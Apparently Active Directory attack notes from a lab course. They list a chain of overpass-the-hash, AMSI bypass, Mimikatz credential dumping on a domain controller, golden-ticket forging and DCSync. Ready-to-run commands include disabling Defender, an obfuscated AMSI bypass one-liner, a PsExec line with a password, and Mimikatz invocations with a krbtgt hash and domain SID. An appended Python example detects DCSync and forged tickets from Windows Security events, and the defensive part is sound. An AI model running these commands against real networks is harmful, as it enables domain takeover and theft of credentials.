Get a PowerShell session as a domain admin using an overpass-the-hash attack
Create a New-PSSession attaching to the domain controller
Enter the new session using Enter-PSSession
Bypass AMSI
Exit
Load Mimikatz.ps1 in the new session using Invoke-Command
Enter the new session using Enter-PSSession again
Now we can execute Mimikatz on the DC
Keep note of the krbtgt hash
Now go to any non-domain-admin account
Load Mimikatz.ps1
Now we can create a ticket using the DC krbtgt hash
Now we can access any service on the DC; example: ls \\dc-corp\C$
or
PsExec64.exe \\test.local -u Domain\user -p Passw0rd! cmd
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
sET-ItEM ( ' V' + ' aR' + ' IA' + ' blE:1q2' + ' uZx' ) ( [TYpE ]( " {1}{O}" -F ' F' , ' rE' ) ) 3 ; ( GeT-VariaBle ( " 1Q2U" + " zX" ) - VaL_s+ )." A`ss`Embly" ." GET`TY`Pe" (( " {6}{3}{1}{4}{2}{@}{5}" -f ' Util' , ' A' , ' Amsi' , ' .Management.' , ' utomation.' , ' s' , ' System' ))." g`e tf`iE1D" ( ( " {O}{2}{1}" -f ' amsi' , ' d' , ' InitFaile' ), (" {2}{4}{O}{1}{3}" -f ' Stat' , ' i' , ' NonPubli' , ' c' , ' c,' ))." sE`T`VaLUE" (${n`ULl} , ${t`RuE} )
Execute Mimikatz on the DC as DA to get the krbtgt hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc
Create a ticket on any machine (pass-the-ticket attack)
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /krbtgt:a9b30e5bO0dc865eadcea941le4ade72d /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
List Kerberos services available
To use the DCSync feature to get the krbtgt hash, execute the command below with DA privileges
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
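Two DC-side indicators of the chain above, checked over constructed Windows Security events: a DCSync replication request (event 4662 carrying the DS-Replication-Get-Changes rights) from an account that is not a domain controller, and a service-ticket request (4769) for a client to which the KDC never issued a TGT (no 4768), which is how a forged ticket injected with /ptt appears. This is an added defensive example, not code from the original page; the event IDs and rights GUIDs are real, while the field layout, account names and IP addresses are constructed.

```python
from collections import defaultdict

# Extended rights that lsadump::dcsync needs; they show up in the Properties
# field of event 4662 (object access) logged on the domain controller.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}

def detect_dcsync(events, dc_accounts):
    """Subjects that exercised replication rights without being a DC account."""
    allowed = {a.lower() for a in dc_accounts}
    return sorted({
        e["subject"] for e in events
        if e["id"] == 4662
        and REPLICATION_GUIDS & set(e.get("properties", []))
        and e["subject"].lower() not in allowed
    })

def detect_tgs_without_tgt(events):
    """Golden-ticket indicator: a 4769 service-ticket request from a client
    that this KDC never issued a TGT to (no matching 4768). Heuristic only:
    a TGT issued by another DC or before the log window also triggers it,
    so run it over events collected from every DC in the domain."""
    tgt_clients = defaultdict(set)  # account -> client IPs seen in a 4768
    for e in events:
        if e["id"] == 4768:
            tgt_clients[e["account"].lower()].add(e["client_ip"])
    return [
        (e["account"], e["client_ip"], e["service"]) for e in events
        if e["id"] == 4769 and e["client_ip"] not in tgt_clients[e["account"].lower()]
    ]

# Constructed sample events (simplified fields, not real telemetry).
SAMPLE_EVENTS = [
    {"id": 4662, "subject": "DOLLARCORP\\DCORP-DC$",
     "properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"id": 4662, "subject": "DOLLARCORP\\student1",
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"id": 4768, "account": "svc_app", "client_ip": "172.16.2.5"},
    {"id": 4769, "account": "svc_app", "client_ip": "172.16.2.5", "service": "cifs/dcorp-dc"},
    {"id": 4769, "account": "Administrator", "client_ip": "172.16.100.7", "service": "cifs/dcorp-dc"},
]
DC_ACCOUNTS = ["DOLLARCORP\\DCORP-DC$"]

if __name__ == "__main__":
    print("DCSync from non-DC:", detect_dcsync(SAMPLE_EVENTS, DC_ACCOUNTS))
    print("TGS without TGT:", detect_tgs_without_tgt(SAMPLE_EVENTS))
```

Once the krbtgt hash is known to have leaked, resetting the krbtgt password twice (letting replication complete between the two resets) invalidates every ticket forged with the old hash.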